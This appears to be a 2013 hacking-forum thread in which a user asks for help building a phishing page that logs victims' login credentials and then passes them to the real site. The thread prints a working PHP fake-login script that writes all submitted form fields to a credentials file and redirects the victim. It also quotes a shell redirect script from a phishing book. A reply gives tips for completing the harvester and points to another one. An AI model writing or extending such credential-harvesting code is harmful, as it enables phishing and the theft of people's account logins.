glum Posted March 10, 2013

Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =)

I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an input text, but also uses that text as a login in the real page.

After some research I learned about the basic fake login script:

    <?php
    header ('Location: http://failedloginpage');
    $handle = fopen("credentials.txt", "a");
    foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

Where after logging in you are redirected to the real page with a failed login.

After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials.

    #!/bin/sh
    PATH=/bin:/usr/bin:/usr/local/bin
    RSERVER=bank.securescience.net/bank
    URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@''
    # Give CGI header and start web page
    echo "Status: 301 Moved
    Content-Type: text/html
    Location: http://${RSERVER}${URI}

    <html>
    <body>
    This page has moved to <a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a>
    </body>
    </html>"

This code takes the URI in REQUEST_URI and removes everything up to /cgi/ (provided /cgi/ is contained within the URI) and places the results in URI. For example, if REQUEST_URI were http://foo.com/stuff/cgi/Login.cgi, the URI would be /cgi/Login.cgi. Then when a header and HTML are sent to the client's browser, stating that we have a different location, the request will transparently move to http://bank.securescience.net/cgi/Login.cgi

I know this is probably pretty simple, but I am a beginner regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting?

Thank you =)

digip Posted March 10, 2013 (edited)

    <?php
    header ('Location: http://failedloginpage');
    $handle = fopen("credentials.txt", "a");
    foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

Looking at that code, the first thing it does is move you to another page. Since header location is the first command, the rest of the code is not going to execute (or shouldn't), since you should automatically be moved to the "failedloginpage"; the rest should be ignored.

Basically, if you're collecting credentials, depending on the form used on the site/page, you need a few things here.

1, log file, which you're good with the credentials.txt. Make sure the file exists first, if not, create it, then do a check for the file exists, if exists, then always append, otherwise, create file, then write to it.

2, a function that takes the form post or get data from a fake login page, that posts the credentials you want and writes it to the txt file.

Not going to write you the whole code for you, but that's just some tips to get you going in the right direction. Search the forums, I helped someone with a credential harvester script for Jasager, that does what you want above, which you can mod and make work for what you are after though. Should be easily adaptable to whatever you want to do with it. I use a version of the same thing for honeypots and fake logins to my own sites and record brute force attempts on my sites. ie: http://www.attack-scanner.com/brutes/brutes.log

Edited March 10, 2013 by digip

glum Posted March 10, 2013

Thank you for your help digip. Actually, although I only tested it on my own computer, the first script works fine, the credentials are logged in and even if the file credentials.txt isn't there it is somehow created by the script. The problem I was having was with the logging in the real page for the client, besides just redirecting him to the "login failed" page. I will try to find your post then and study it =)

glum Posted March 12, 2013

I found the solution to my problem. In case anyone wants to know, here it is: http://css-tricks.com/snippets/php/append-login-credentials-to-url/

cheers